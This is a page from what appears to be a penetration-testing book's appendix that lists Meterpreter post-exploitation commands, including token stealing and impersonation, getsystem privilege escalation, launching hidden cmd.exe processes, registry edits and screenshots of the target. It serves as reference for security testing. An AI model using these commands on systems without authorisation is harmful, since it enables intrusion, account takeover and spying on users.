background image

278

Appendix B

use priv

Load the privilege extension for extended Meterpreter libraries.

ps

Show all running processes and which accounts are associated with each 
process.

migrate 

PID

Migrate to the specific process ID (PID is the target process ID gained 
from the 

ps

 command).

use incognito

Load 

incognito

 functions. (Used for token stealing and impersonation on 

a target machine.)

list_tokens -u

List available tokens on the target by user.

list_tokens -g

List available tokens on the target by group.

impersonate_token DOMAIN_NAME\\USERNAME

Impersonate a token available on the target.

steal_token 

PID

Steal the tokens available for a given process and impersonate that token.

drop_token

Stop impersonating the current token.

getsystem

Attempt to elevate permissions to SYSTEM-level access through multiple 
attack vectors.

shell

Drop into an interactive shell with all available tokens.

execute -f cmd.exe -i

Execute 

cmd.exe

 and interact with it.

execute -f cmd.exe -i -t

Execute 

cmd.exe

 with all available tokens.

execute -f cmd.exe -i -H -t

Execute 

cmd.exe

 with all available tokens and make it a hidden process.

rev2self

Revert back to the original user you used to compromise the target.

reg 

command

Interact, create, delete, query, set, and much more in the target’s registry.

setdesktop 

number

Switch to a different screen based on who is logged in.

screenshot

Take a screenshot of the target’s screen.